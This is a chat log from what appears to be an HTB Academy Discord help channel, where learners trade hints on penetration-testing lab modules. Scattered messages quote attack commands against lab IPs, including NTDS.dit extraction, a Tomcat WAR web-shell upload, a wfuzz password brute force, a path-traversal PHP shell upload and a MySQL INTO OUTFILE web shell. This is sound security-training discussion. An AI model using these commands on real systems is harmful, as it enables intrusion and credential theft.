I’m really stuck on Attacking Common Services - Attacking DNS.
I have found lol the subdomain and everything. But I tried Dig AXFR command on all but nothing is working. Im not sure what I am missing exactly but nothing seems to work.
I also have edited the /etc/hosts.

in passwords attacks / AD, the following command is listed || *Evil-WinRM* PS C:\NTDS> cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit ||. looks to me like it's simply overwriting the original file rather than putting it elsewhere before exfiltration?

this command copies the NTDS.dit file (which contains the Active Directory database) from a Volume Shadow Copy snapshot to the "NTDS" folder on the C: drive

that's what I thought, it's just that that path is standard as is explained in the same section, so I'm not sure what the point would be

anyone else experience issues with the machine for the virtual hosts section of the information gathering module? One minute the machine works the next it doesn't even respond to a curl request

Shells & Payloads >> Anatomy Of A Shell >>. In Pwnbox issue the $PSversiontable variable using PowerShell. Submit the edition of PowerShell that is running as the answer. I give the correct answer and am told that it is wrong. Can I get some help?

Are you sure you entered the edition and not the version?

I'm confused... int he Windows Security section in the Windows fundementals module they say to find the user SID using Get-WmiObject, but up to this point I don't recall (and I looked though my notes too) any such cmdlet that includes SID of users other then the one already logged in. I tried runAs but it requires the password of the user.

I’m an idiot lol, thanks!

no problem, i did the same thing lol

halp

I'm honestly lost

well it's there, but I'm not sure how to explain it without downright spoiling the solution

point me to the section

Wait.. they mean the SID from the page itself?

that sounds like cheating..

ok good it is't it

no, it's not displayed on the page. I've searched microsoft's KB but can't find the argument for some reason and I wasn't keeping notes back when I did that module

is the command in the module?

it's in the hint

? Get-WmiObject isn't really helpful if I don't know what object to query

there are tons

if you google ||get-wmiobject sid|| you'll find something useful on ||likely the first result, on tenforums||

Ok so it isn't in the module... that kinda mean after all that info dump

thanks n4p ❤️

can anyone help me to solve this questions --- Find a way to start a simple HTTP server inside Pwnbox or your local VM using "php". Submit the command that starts the web server on the localhost (127.0.0.1) on port 8080.

Ok so I can see the answer... || nordVPN|| for the second question, but how do I know it's disabled on startup? do I really need to go to ||task Manager|| ?is there a way to check that from the command line?

no problem. it happens sometimes that you need to find some info outside the modules. also I just noticed that you can do something like ||get-wmiobject -list | select-string user|| to look for classes related to users. I wish I could remember what my thought process was when I solved it but I'm drawing complete blanks

oki

thanks 🙂

not sure about the command line. I believe I just had a look what's in the start menu that's not running. but you can also open ||"startup apps" in the start menu|| and have a look

Hi everyone, hope you are well
Quick question, i juste finished the getting started module and "hacked" the box at the end of the modules.
My problem is that i was working on the HTB workstation and lost the connection after submitting the root flag.
I didn't had the time to export the information do you know if i can find the walkthrough somewhere ?

Thanks in advance for your response

Could someone help me with Password Attacks Hard Lab? I tried brute forcing Johanna's password, but cannot get anything. I used mut.lists from the resources .

if the workstation was terminated before you saved any notes you wanted to keep elsewhere i'm afraid it's gone

I'm on the third question of the skills assessment for Pivoting, Tunneling and Port Forwarding. I've tried several things to either get a meterpreter reverse tcp shell or to try and get the ssh password and move forward with enumerating the network. So far, nothing has worked. Can someone give me a hint as to how to move forward?

DM if you need

Will do. Thank you!

hi ! i am stuck in HTB academy live engagement module

need a little help in exploiting the HOST 1

curl -v -u tomcat:XXXXXX -T /usr/share/webshells/laudanum/jsp/cmd.war 'http://172.16.1.11:8080/manager/text/deploy?path=cmd.war&update=true'

but it says unauthorized to upload

by logging in to manager through gui the credentials work

now thinking that there must be something wrong

need a direction

i might be able to help. DM

found the way. ❤️

first time in hack the box and no experience! could someone tell me how to use openvpn? I've already download the files, unfortunately, when I open kali linux, the files is not abled to drag over. how can i figure it out?

@desert lark use sudo openvpn file name

$ sudo openvpn <FILENAME>

I GOT IT! first time try~

niceee

In active directory living off the land... the last question, I am not understanding how to setup my DSQuery and LDAP filter.. Can anyone help me out? "Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer"

hi, I am doing the getting started fundamentals and on the gobuster module, I am running the vpn, and when I try to use gobuster and the ipaddress that I was given, I am getting a timeout error, can someone pls give me some pointers

hi anyone who can help me with tomcat manager upload issue ... i am facing in Shells & payloads - The live engagement - host #1

Hey, I got stuck on Q7 from AD Enumeration Module Skills Assessment II. I got revshell with the user, but how can I get additional info from here? any hints? thank you 🥲

So you have a shell on SQL01 right now?

hey thanks for replying! yes I have, but I can't upload any files like mimikatz, I'm trying to do something with net commands, but no success 😦

hmm how did you get the shell?

well, basically with xp_cmdshell I just uploaded ps1 rev shell file and executed it

ahh ok, you need to work on getting a more stable shell at this point. See if you can figure out how to get a stable shell back to your attack machine

Oh okay, thank you! Can I DM you if I can't solve it in few hours? haha my boss wants me to clear this path in a week so I'm quite in rush 😦

Yeah no problem

Thanks dude, but first I'll try my best to figure it myself 🙂

I might have misunderstood, if you already ran a ps1 shell, from xp_cmdsell, back to your attack machine, then look for a way to escalate your privileges, Anyway feel free to DM me.

Module: Linux Privilege Escalation
Section: Wildcard Abuse
I'm reasonably comfortable with cronjobs. But what does NOT make sense is how the escalation vector is supposed to work if that command is executed from within the root folder? I've tried this on my VM with no success. I'm sure I'm doing something wrong. Can anyone explain this?

Hi I could have sworn I was doing this last exercise right for PowerShell in Windows Command Line Module

who work with sql

I must be stupid! In the introduction to academy the very first question? What is the name of the first section of this module? I have tried til I'm blue can someone point me in the right direction. I am new to the p c stuff so please go easy on me. Thanks

hi guys, I am trying to do an nmap on a ip address, and I am connected to the vpn, but when I try nmap, it says the host is down, any tips/ suggestions?

Answer this "what is a section" and you'll have your answer

Hi guys, I put user10, user10@greenhorn.corp, etc in for the answer to the Windows Command Line Module's final question. Can you please help me figure this out? I tried this tutorial but for Event 4625

Ping, try different tools. Maybe it's a public IP that requires curl/whatweb/Firefox to interact

ahh ok

tutorial:

https://4sysops.com/archives/find-the-source-of-account-lockouts-in-ad/

Its for finding the user account on domain controller with Event ID 4625

What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? Flag is the name of the user account.

could someone help me out?

I know Advapi is not the answer

could someone help me out?

I don't get it

when I am trying to exploit a target and it says that the target is not exploitable, does that mean that the exploit I am trying to use wont work? or the method that I am trying to use should be different?

it looks like (from other discussions) that due to some security patch (possibly), it only works with a separate CA that is not a DC. Perhaps the lab should be updated, as without a certificate we cannot proceed with the following sections of the module

maybe I should ask a better question, when I search on the searchsploit for an exploit and a ton of different exploits show up, can I just choose any one of them or is there someway I should know which one to pick?

Generally to narrow down choices you should be clarifying version number

so I would say "search exploit "name" "version" ?

Yes

ok

when I do that, i getting no search results

What's the module you're doing?

fundamentals of hacking attack public exploits

Ah then I would definitely make sure you keep it Simple ;)

hi how to I find waldo.txt?

I'm struggling

if I use the searchsploit and the name with file, i get results, but I am not really sure how to use the exploits

Definitely read the module carefully

ok

When I get home later I may be able to provide better hints of you still don't have it

that would be greatly appreciated

I am doing Password Attacks Lab - Hard and i found valid creds. and logged into RDP and evil_winrm, but i can't progress any further

can dm someone ?

The hard lab iirc is all about back and forth exfil data and cracking

i have tried dumping sam lsass, but couldn't

there is ***.kdbx but i don't know what to do with it

Crack it :)

Look at what programs the user has access to

^ there are a few files in that lab that are rather interesting, and in some cases might need exfiltration.

One of those is a password manager. Perhaps that matches the .kbdx format

There is a k*2john as your other hint

i have found a fat passwords file, but i can't do anything with it (**/1/password.txt)

These are some of the baseline hints I can give

Not home so can't check notes

this is gonna sound rlly dumb but

what does the bash terminal icon look like 😭

thanks for everything!

thanks for everything!

When you open terminal what does it look like

Hint it's a character

Iirc

kinda like a windows home

Terminal = command line

oh

omg im dumb ok thanks

Ywyw

sorry idk anything abt like this stuff at all

Also welcome to hacking

Nah you're good

The only time any of the active people will be really pedantic/sassy is when someone is showing a clear lack of reading comprehension

i think im still dumb

can i send you a ss of what it looks like

Not at home

screenshot

If you're using pwnbox it's the green box

You do need to be using a Linux VM or pwnbox

Hint though: look carefully at the command line iirc

omg ok i did it

it was called like MATE terminal and not bash terminal 😭

thank you

MATE is the terminal: bash is the actual command line interpreter

oh okay thank you

i jus thought the website looked cool as you can tell im going into this w absolutely no idea what im doing

thanksfor ypur help and patience :)

Hi guys, a few months ago I tried to do the finding files and directories section of Windows Command Line Module. I asked for help when the file Waldo.txt, containing the flag, could not be found. The HTB Academy community said I should come back to it later so I completed other modules as well as the rest of windows cmd line module later on, and after I did that I got back to this module finding files and directories. I will look again for Waldo.txt but I don’t want to waste my time because the HTB Academy community said the flag is not stored on that server and that the HTB Academy devs made a mistake when writing that section initially. Should I try this module again or should I just get the flag online or something? In other words, has the exercise been fixed yet?

And if not how am I supposed to get the flag if the file is not there

I did this module about 3 weeks ago, i found the file and submitted a flag.

Ok thanks. In that case I will try again later tonight.

so im looking for the proper NSE script on the nmap module

im having trouble with what port or what script

ive tried both --banner and -vuln on both 31337 and 80

DM if youre still stuck

Hello all…having a hell of a time with the command injection skills assessment. I’ve found the injection point, and can tell I’m close since I’m getting the ‘Malicious request denied!’ message….but can’t seem to get anywhere. I’ve literally tried every injection operator…as well as o’bfus’ca’ti’on if you know what I mean….but no dice. Any nudges?

@mystic light had some random luck picking the right script in the NSE but thanks!

Active Directory Enumeration & Attacks <<< this module is like 100 miles long. sheesh 😄

Ladies and gentlemen, I am proud to say I found the solution.

To any that may have trouble with this skills assessment….remember that this calls for advanced command obfuscation…and when looking for an injection point….check EVERYWHERE on the page…this website allows you to do some interesting things 😉

Module: Shells and Payloads

Section: Live Engagement

because that's the custom version but not the actual version; do an nmap scan and check for the version to get it

that answers a different question in that section

Hello. I'm working through the live engagement for the shells and payloads module and cant figure out how to access host 1. It seems like there should be a web browser or something on the footprinting machine but I can't seem to find one installed. Can someone help out?

firefox in command line

ahh thank you....feeling a bit dumb over here

eh if you haven't really run firefox from your vm's terminal before you don't immediately think about it

also for smb section you will use pretty much each of the tools discussed

Hello, anyone was solved the Skills Assessment - Service Login? i'm stuck trying guess credentials, i am using cupp and only setting name, surname and birthday, also pet name, but nothing, i should use other data to generate password? for user i am trying with username-anarchy.

I'm on the Pivot, Tunneling and Port Forwarding skills assessment and I'm having a problem with the 4th question. I can get chisel to work up to the point where you're supposed to rdp into the live host that you found on the adjacent network with the user name and password you found. However, I'm getting a very strange error of Failed at index 1 [v:ip address of the pivot target]: Invalid sigil. Has anyone seen that before or know how to resolve it?

I've tried using an ssh tunnel instead, but that fails without the password for the linux host, which I don't have.

proxychains xfreerdp /v:ip address of pivot target /u:username /p:password

Thank you!

What should it be then?

I copied and pasted it directly from the 3rd answer and I still get the same error. Could it be that my config file might be incorrect?

add proxy here ...

socks4 127.0.0.1 9050

socks5 127.0.0.1 1080 (is how my config file looks)

Wow, that copied and pasted strangely.

LOL!

In the Attacking Common Applications Module, there are some new sections that were recently added. Has anyone done the Attacking Think Client Applications section? I finished it but it won't take my answer, so I was hoping I could verify my findings with someone else who has completed that section. https://academy.hackthebox.com/module/113/section/2139

I completed windows command line module

Lmao

iirc there have been some issues with that section might need to message support directly on the site

Would I just do that in the erratum channel?

no

on the academy site on the bottom right you should see a green chat bubble

ok thanks! will do

if you don't see it: Disable ad-block; disable any vpn you may be using

👍

yuck, I had to use my Windows machine with Edge to get to it, thanks for the tip!

oof; also to get credit just provide the POC/attack chain you used to get what you assume is the correct answer and they'll be able to sort it out for you

can you help me

Why don't you ask your question here to see if someone can help you instead of replying to someone randomly who's message was a few weeks to a month ago

I finished the Log Poisoning section of the FILE INCLUSION module. If anyone has any questions, maybe I can help with something. I had some trouble doing it, which is why I offer my help.

can anyone help me to find the answer of ----- What is the size in GiB of the "/dev/vda" disk in our Pwnbox? (Format: 000)

I am stuck on what to do for NMAP module, hard lab challenge

Would love some help

the hint is cryptic as hell and ive been at it for a few hours (really just waiting for -sS -D scan to finish, no avail)

got it, so lame. really bad hint HTB.

I didnt even discover it myself.

Hello

hi

I have finished these modules, if anyone needs help I can explain a little.

#1024429874246590575

need some help with the nmap module, the whole ids thing, i can't seem to see how to stop ids

you dont stop it, you circumvent it

@rustic sage yeh i get that, but so far, ive done spoofing the ips and redirecting the ports as well as fragmenting the packets

which lab?

hard lab

welcome to the club

its a shit lab in that module

i spent 4-5 hours on it

bad hints, bad explanation

try netcatting to port 50k like it did in the primer

i netcatted a bunch of ports already, haven't not 50k yet

must say thats a random one

because it doesnt enumerate

HTB needs to fix it

my scan took 3 and a half hours and didnt detect it

kk ill give it a go then

@rustic sage got it , so do you think theres any differnce between ncat and nc?

they are different

ncat is basically an extension of functionality

its "modern"

the syntax is compatible

@rustic sage so ncat is better would you say then?

yes

What exactly did not work. The path was discussed almost 1:1 in the module. Right?

bashing my head against a wall for broken authentication module brute force attack against htbuser. you have to identify the password policy which i have..but keep getting too many login failures. have added x-forwarded-for but no joy. this module is the least fun 😦 any tips?
wfuzz -b "PHPSESSID=bcpma2pk6deoig3h587itscvt8" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0" -H "X-Forwarded-For: 127.0.0.1" -c -w output.txt -d "userid=htbuser&passwd=FUZZ&submit=submit" --hs "Invalid credentials." http://139.59.181.223:31707/

sure, thats where i copied the command from, verbatim. But the port was not revealed in a manner that was congruent with the lab context or hint, it was utter garbage

The goal of the modules is not that you copy and apply the commands 1:1, but that you understand the. The goal is not that you copy the commands 1:1 and apply them, but that you understand the way and can apply it afterwards.

So if you understood the way, it should be possible without problems to detect another port and adjust your payload accordingly.

My guy, i even resorted to chatgpt to help with the payload

me and another had the same issue

this ones on HTB

I don’t recall have any issues with it. But sadly didn’t record any notes on it.

Nmap, hard lab 3, We both used fragmentation, decoys, syn scan, etc

Port didnt show at all, not even filtered

I got the flag on a fluke, guessing

I remember finding medium being harder

Medium and easy took me 5 minutes each

Hard is poorly presented

it consumed 5 hours of my day doing painstaking scans

So have you actually understood why the guess worked?

DM

Not at all

For the second question on the Dynamic Port Forwarding lesson, when I attempt to enable dynamic port forwarding with ssh, I log in as the ubuntu user instead. Any hints on what could be the issue? Here is my command: ssh -D 9050 ubuntu@10.129.49.53

Hey I’m sorry I can’t find which channel they talk about the pro labs , how do I find this?

#welcome

Ty

can anyone explain me why this query is not working for this question: In the 'titles' table, what is the number of records WHERE the employee number is greater than 10000 OR their title does NOT contain 'engineer'?

My query: ||SELECT * FROM titles WHERE emp_no > 10000 OR title NOT LIKE '%Engineer%';||

which question are you taling about

This command does the forwarding and logs you in as the user. I believe there is a flag to prevent the login shell but either way, the forward should work

I believe 'Engineer' has to be 'engineer'

I just figured it out. I didn't know I had to keep the connection with the target open for the proxy to work.

The flag to prevent a login shell should be -N iirc

Would anyone be able to provide some guidance?
Module: HTTPS/TLS Attacks
Chapter: POODLE & BEAST
Question: Construct a valid SSL 3.0 padding of the plaintext bytes "AABBCCDDEEFF". Use the byte 00 for any byte that can be an arbitrary value. Provide the padded plaintext without spaces. Assume the cipher suite TLS_RSA_WITH_AES_128_CBC_SHA is used.

I'm just a little bit lost on what the actual quesiton is wanting you to do. I've tried following the examples, but I'm not getting the vulnerable and not-vulnerable responses. Is there a specific host I'm meant to be testing against?

Thanks for the response.

You're welcome 🙂

Try limiting the number of concurrent connections and delaying the time between each request.

I finished the FILE INCLUSION module, so if anyone has any doubts, maybe I can help.

yes got it

anyone able to help me with sql injection with comments im trying to figure out how it works

sure dm me

anyone able to help me with this question? We see in the above PHP code that '$conn' is not defined, so it must be imported using the PHP include command. Check the imported page to obtain the database password.

nvm got it

hi can an admin or moderator please DM me

Why do you need to be dmed

Nevermind solved it. I didn't realise you just need to manually write out the padding. (- -)

hello guys i didnt kow where to ask this but here i am

so if im brutefroing a ssh port and the brute force attack is a sucsess wold i have to be on the same network as the server to gain root access to it?

@fathom pendant

24 seconds

Observe the web application based at subdirectory /question1/ and infer rate limiting. What is the wait time imposed after an attacker hits the limit? (round to a 10-second timeframe, e.g., 10 or 20)

So round up to 30

still wrong

invalid answer

its really guessy 😢

i haven't done the module ¯_(ツ)_/¯

It shouldn't be guess based you should have enough clues within the module and section to get you the answer

Hint

Try to generate some failed login attempts.

the HINT its guessy lol

Module Attacking Common Services - Lab Easy
hello, I have been able to enumerate the host and get to the file upload part.
ty in advance
supposedly I have been able to upload a php shell, the simple one where you supply the "cmd=<command>" part in the url.
but I haven't been able to launch it, I also tried to upload wwwolf php shell and launch it but with no avail.
here are the commands I used
file upload
||curl -k -X PUT -H "Host: 10.129.99.210" --basic -u <user>:<password> -F 'fileX=@/home/user/shell.php' 'https://10.129.99.210/../../../../../..\xampp\htdocs\myshell.php' ||
but when it comes to running them im uncertain tbh
i have tried the url method where i supply the cmd param at the end (?cmd="whoami")
i have also tried invoking a rev shell with curl, but it keeps giving me a (No Header Colon Error)
||curl -k -X GET -H "HOST: localhost" -u <user>:<pass> 'https://10.129.99.210/shell.php?cmd="whoami"' ||

and the upload command gave me a 200 response code

i have been able to access the files on the server originally, other than it won't work

Hi there, can anyone nudge me on Q6 AD Enumeration Module Skills Assessment II? It's kicking my ass

Trying to finish up the live engagement part of the shells and payloads module. Have tried running the eternalblue metasploit module on host 3 but but can't seem to get a shell (Exploit completed, but no session was created). can anyone help my out?

change up the exploit, there are multiple variations for the exploit, there is a particular one used throughout the explanation in the module

So im new to this thing. Where should I start?

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible give this a read

im officially stuck, i uploaded the shell using MySQL, but i haven't been able to run it, and when i try to load it with MySQL to view it's contents, it gives me NULL.
the cur command i use to try to invoke the shell:
||curl -k -u <user>:<pass> "https://10.129.203.7/webshell.php" ||
and the SQL commands
||SELECT "<?php echo shell_exec($_GET['whoami']);?>" INTO OUTFILE 'C:\xampp\htdocs\webshell.php'||
||select load_file("C:\xampp\htdocs\webshell.php");||

if anyone could lend a hand, please do

From my notes, you don't need the ||select Load_file||. Also, you should use ||double slashes. As in "C:\\xampp"||. Then you should just be able to query via the webshell with ||the command you need to access the file||.

wait, i did the first two notes, but the last one, that's where im lost

the ||select load_file|| i used it to check if my files r uploaded correctly or not, i used the ||double slashes|| when i noticed that the file names r messed up, but i still can't access the file xD

Youre using load file to try and execute the webshell?

Hello, anyone was solved, the Skills Assessment - Service Login? I'm stuck trying guess credentials, I am using cap and only setting name, surname and birthday, also pet name, but nothing, I should use other data to generate password? For user I am trying with username-anarchy.

i figured it out, i had to encode the commands some way to get them to work

🤘

well afaik the question suggests using UsernameGenerator which is another tool. not sure if username-anarchy generates the right one too.
If that doesn't work either, dm me and I'll take a closer look

dm me if you're still stuck

hey guys quick question for the nibbles box module in getting started, for my priv esc from the normal user nibble, the only way i could get root through my reverse shell was having to specify the full path of where the shell script was that the user had root permission to run as opposed to just doing ./script.sh why is that?

e.g sudo /home/user/nibble/script.sh as opposed to sudo script.sh

Just one of those weird things with sudo iirc

is it bad I just used SOCKS and proxy chains for the payloads assessment because the foothold box annoyed me?

theres many ways to skin a squirel

Salam

Hello i need some help on the Windows Priv Esc PILLAGING last question "Restore the directory containing the files needed to obtain the password hashes for local users. Submit the Administrator hash as the answer", i restored all 3 but there is nothing containing SAM or SYSTEM

Hi! i am trying to complete "using web proxies" and i am stuck on the ZAP fuzzer lab. I am fuzzing the cookie with the md5 hash of the usernames in the file "top-usernames-shortlist.txt" but i am still unable to find the flag. can someone point out what i am doing wrong please.

Im working on Kerberoasting - from Linux and I'm stuck on the question What powerful local group on the Domain Controller is the SAPService user a member of?

here is a screen shot of the thing i am trying to do .

It tells you when you run the command you would have run to solve question #1 in that chapter.

For Password Attacks > Credential Hunting in Linux, does anyone know the intended way without using the hint?

It feels like the hint is almost required

In the Attacking Common Applications module, Exploiting Web Vulnerabilities in Thick-Client Applications, section. I am wondering if there is anyone who can help me? I got as far as the part where I should be able to use the .jar file to download fatty-server.jar to the desktop. When I try this nothing downloads and the .jar file I am running tries to open the fatty-server.jar inside the traverse.jar app. There is a part where it has me edit Invoker.java then rebuild the jar. I am guessing this is where I messed something up (either editing or building the jar). anyway I was hoping someone could shed some light on it. Thanks!

I don't recall what the hint was. I don't believe I used to it. Its very much just riffing off of the example. Took me awhile to understand it, but makes sense when it clicks what you're trying to do.

I’m almost at the same point as you mine won’t even open after editing invoker.java…

My suggestion to you both would be to not mess with the invoker.java. Instead ||look at the later part of the chapter text. There's another java file that they modify in their example.||

🤦‍♂️ yup, right there in front of me... Thank you!! I'll try this in a bit when I have time.

It had my going down the rabbit hole as well. 😉

There is a part right before SQL injection where it tells me to modify it, that is why I went that route ```We can modify the open function in fatty-client-new.jar.src/htb/fatty/client/methods/Invoker.java to download the file fatty-server.jar as follows.
Code: java

import java.io.FileOutputStream;
<SNIP>
public String open(String foldername, String filename) throws MessageParseException, MessageBuildExcept
ion, IOException {
String methodName = (new Object() { }).getClass().getEnclosingMethod().getName();
logger.logInfo("[+] Method '" + methodName + "' was called by user '" + this.user.getUsername() + "'.");
if (AccessCheck.checkAccess(methodName, this.user)) {
return "Error: Method '" + methodName + "' is not allowed for this user account";
}
this.action = new ActionMessage(this.sessionID, "open");
this.action.addArgument(foldername);
this.action.addArgument(filename);
sendAndRecv();
FileOutputStream fos;
String desktopPath = System.getProperty("user.home") + "\Desktop\fatty-server.jar";
fos = new FileOutputStream(desktopPath);
if (this.response.hasError()) {
return "Error: Your action caused an error on the application server!";
}
String response = "";
try {
response = this.response.getContentAsString();
} catch (Exception e) {
response = "Unable to convert byte[] to String. Did you read in a binary file?";
}
fos.write(this.response.getContent());
fos.close();
return response;
}
<SNIP>

Yep, same. I did loads of screwing around before I realised my mistake.

ok this is making me head hurt! Going to take a break and try again, thank you again.

My brain might be too fried right now but where is the mistake ?

Modifying ||the wrong java file.||

There’s something I might be missing? The instructions literally tell you to modify the Invoker.java file

I’m so confused and exhausted been trying this for hours so I fun

So unfun

Hello everyone Does anyone know where I can ask Linux questions

It does, but that's an example. Stop focussing on that section, and look at the rest of the text.

Your ultimate goal is to get the IP address. Not to follow the example. 🙂

Seems I can skip that part and follow along with the SQL I think right?

I've been working on the Live Engagement portion of the Shells and Payloads module for WAY too long and I am struggling to get a session on Host 3. I've tried all of the eternalblue metasploit modules and scanners and for some reason cannot find a way to get a shell. Is there a parameter or options that I could be overlooking when configuring the exploit?

||And the teensy bit before||

in shells and payloads which browser do i have too use

for the engagement

any should work, no?

Hi on the windows fundemental aseesemtn I don't have access to create new users in powershell. is tha intentional? do I really have to go through all the menues?

hey anybody help me with aws fortress

not that I'd remember. I can take another look if necessary

stuck on ad attack
no clue how to exploit it
nothing works here

krbrute not working no smb blah blah balh☹️

someone who completed sheels and payloads i need help with the browser

open terminal and type "firefox" or use burpsuite browser

ty

was using links 2 and is so fucking slow

Done with the section, still very frustrating I guess not for people who know Java. Thanks for the help

Mind if I dm?

anyone else struggling with the metasploit modules trying to exploit Host 3 in the Live Engagement section of the Shells and Payloads modules? ive tried all of the modules and configuring them with different options and cant seem to grab a shell....

Hello everybody, is there anyone completed Busqueda machine?

This isn't the place to ask for that you read #rules and #welcome ; once you verified your account there is a #boxes and #1094319042384375920 channel.

I want some hints only

yes and you can ask for hints in those channels

this channel is for hints regarding the modules found at https://academy.hackthebox.com

metasploit not allowed for oscp

not sure if for the cpts is allowed

any tools talked about in the modules are allowed in cpts

it would be kinda silly if they said "hey here's a tool... but you can't use it"

Still good advice—best to know what a script is doing

Guys, does anyone here speak Portuguese?

Heading to bed. Try tomorrow 🙂

I too have fallen victim to the the last question in the footprinting section on DNS...I can't find all the zones...any hints please

thank you, i will try

subdomains of subdomains; make sure your initial subdomain list has all the available x.inlanefreight.htb :)

the second uses a list from SecLists

your answer will be x.y.inlanefreight.htb

thanks I will chew on this

I got it but how do I know that subdomain was a zone vs all the other ones??

just bruteforce/trial and error

You can't do a zone transfer but you can bruteforce it. I can't understand that unless you just do it for all of them, I think that's the point...

i mean yeah

cause there's 2 ways to go about the bruteforcing is you can individual replace OR create a list and do the bruteforce using the list

I completed the NETWORK ENUMERATION WITH NMAP module, maybe i can help someone who is having issues.

just lurk and wait for someone to ask a question related to it

I don't have much time to read everything, so if anyone needs help, please send me a message.

I mean I don't generally read everything either just the last handful of messages when I first hop on and while I'm just active

but giving the blanket "send me a DM" can be loaded, it definitely doesn't let you filter out people that just refuse to read

Yeah, but many people could search info about any module using the Discord search engine and find helpful messages, including my message

(here's a hint, they generally don't)

Does anyone have any clues to solve Firewall and IDS/IPS Evasion - Hard Lab?

from nmap module

Anyobe did the CCT or Crest module and took the exam?

how well does it prepare you?

i wonder do you still need extra thing for the exam or just the module will be enough

hello guys

@rustic gyro you will need to do some prolabs to be confident to take the exam

you took the exam? or the course?

which one?

i dont go for participate in youre plattform i go search people for collaborate with my bussines of cybersecurity and my certifications OSCP

im founder of OSC Offensive Security & Consultancy

@rustic gyro You will choose prolab according to your choice

getings

i want colaborate with me certifications and the practice my profesionals and the plattform

& HackTheBox

which do you recommend if i wanted to take CCT? i am currently a CRT so confident is not a problem. just wanted to know if the material in the prep course will be enough.

thats youre opinion of certificate OSCP

🙂

@rustic gyro Since I haven't done most of prolabs I think donte is good

im founder of this busines OSC Offensive Security & Consultancy

theyre like see me url web ??

the one created by the creator of capture the talent? shaun?

@rustic gyro I don't think that is the person who created donte

the person in the link on teh right no?

but i remember his name on the cert

@rustic gyro maybe

but maybe i am wrong

@rustic gyro Just try the Dante prolab you may like it

Can we please keep this channel on topic to academy

sure, just thinking to do that or cpts

@rustic gyro If you have the experience with the environment you can just do cpts

thanks

Just solved my first easy lab without any help GG

@quick cloud congratulations 🎊 👏 💐 🥳

Hi, everyone!

Can someone help me with "Intro to Assembly Language" - (Skill Assessment Task 1)?

Should my binary ./loaded_shellcode to return either "Segmentation fault" or the decoded shellcode?

I will thankful for any hint

Hi all. I tried to complete the module common app attacks but I'm stuck on the skill assessment 1. I found de Wxx-xxx/cxx but impossible to find something interesting in it. I tried to fuzz multiple extension but nothing.. If someone can give me a hint it will be very appreciated 🙂

Hello, this is kind of off topic and i don't know where to ask this... But i am planning to buy new machine (laptop ) considering intel 12 gen hybrid architecture.
Is there any problem in running vms on hybrid architecture?
Should i go for it?

@rustic sage <@&861185840277487616>

Read the section ids/IPS evasion carefully

Ask in #1024429874246590575

Need some hints on Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host. for assessment 2 on AD enum and attack, i found the password dumping the lsa, but i cant seem to get the username for that password

Please remove the image as it is actually a spoiler. (Spoiler tagging doesn't really do much) but also is there any other accounts found? Perhaps the actual password itself may be a clue. Think, you're on a windows device

sry

hmm ok ill try agn

Hello, in attacking common services hard , I'm having problems to find the flag (I can't activate xp_cmdshell.

I get a 0 when trying to impersonate John.
Will appreciate hints and nudges please dm

Iirc there is another sql server you can access through the current one, it's DEFINITELY something I had to do a lot of looking up to get the answer to I can't remember if it's somewhat gone over or not in the sql section

But it does require some abstracting

I think I found the testadmin

On Local.test.linked...

i am still doing Password Attacks Lab - Hard and i reached to somefile.vhd
i have bitlocker2john , produced some hashes, but only cracked one of 2 with the same password
and when i try to mount the vdh file with the pass i found, this what i get

Enter key or passphrase ("/dev/sda2"): guestmount: no operating system was found on this disk

any help ?

Active Directory skill assessment #2: + 1 Crack this user's password hash and submit the cleartext password as your answer.
I have gotten the user account name via bloodhound but im stuck on how to get his hash, ive tried kerberoasting dumping lsass/sam but got nothing

Ok so i got the password by password spraying but im wondering whats the way to get the users hash

i made it, what do you want to know?

in a chapter they told you nmap miss stuff and it is better to connect directly to the service to know more like version of the software used

ad skills assesment 2 : i dont get how to get printspoofer on target system

but how do u get responder to work if u arent logged into ct059 to make the request

i just host httpserver on the parrot and certutil it from the target

Wow just finished AD module, good stuff

hi all
i tried to complete the module Attacking Common Applications but i am stuck on the
Exploiting Web Vulnerabilities in Thick-Client Applications section since several days..
I get an error when i use the cmd : javac -cp fatty-client-new.jar fatty-client-new.jar.src/htb/fatty/client/gui/ClientGuiTest.java
(error: cannot find symbol (for all classes in the file))
and the new class are not created so i cant move to the next step... I cant figure out what i missing out
and i have to say java and me is cleary not a love story xD
If some one can help me on this it will be very apprecitated
tkanks all

Am I missing something obvious?

**"Authenticate to 10.129.159.194 with user "htbdbuser" and password "MSSQLAccess01!" **

On the Attacking Common Services >> Attacking SQL Databases section:

1. I have attempted to authenticate with mssqlclient.py
2. I have attempted to authenticate with sqsh -- both normal and windows-auth

Regardless, both methods fail. I am doing this directly from the HTB-supplied machine. I have restarted the target machine twice.

mssqlclient.py -p 1433 htbdbuser@IP

Worked for me

Sure enough! That did it. Strange that the other syntax doesn't work -- especially the syntax directly from the "cheat sheet" in the course. Maybe just something being odd today. Thanks for your help!

Also sqsh seems to be broken in general

Ah, maybe HTB Academy needs to update that portion then

It's broken specifically for parrot, pwnbox is a fork of parrot

Iirc people had no issues with sqsh on Kali or Ubuntu systems

Oh, that makes sense. Usually I use my own Kali VM for the labs, but have run into issues which require the Pwnbox specifically -- so for this one, it requires NOT using the pwnbox specifically 😂

I mean no labs really require the pwnbox

I've managed pretty fine without it

I only really hop on the pwnbox if I think that what I'm doing should get results but isn't for some reason

#module name: Shells & Payloads
#section name: Reverse Shells
#question: Connect to the target via RDP and establish a reverse shell session with your attack box then submit the hostname of the target box.

I'm using a personal VM with a VPN connection. I've setup up nc listener on my attack box. RDP'd into the target box, no issues. When I run any attempt to establish a reverse shell on the target, powershell either dumps a list of erorrs or powershell just closes out and no connection is established. I've tried using the PS one-liner that's provided in the lesson (adjusting the IP and port accordingly) and I've tried using one-liners from both PayloadAllTheThings and revshells.com. Issue persists. Any help would be appreciated.

Edit: Resolved.

I just have one thing to say:
https://academy.hackthebox.com/achievement/badge/5238360d-dd39-11ed-acfc-bea50ffe6cb4

😅

Congrats 🎉

Great job, Congrats !!

Same issue, the module is likely broken and the server ignores every verb it doesn't handle (OPTIONS included)

Hi

any help ?

I couldnt get mounting to work on linux in any reasonable timeframe. Instead i pulled it off and mounted on a windows box.

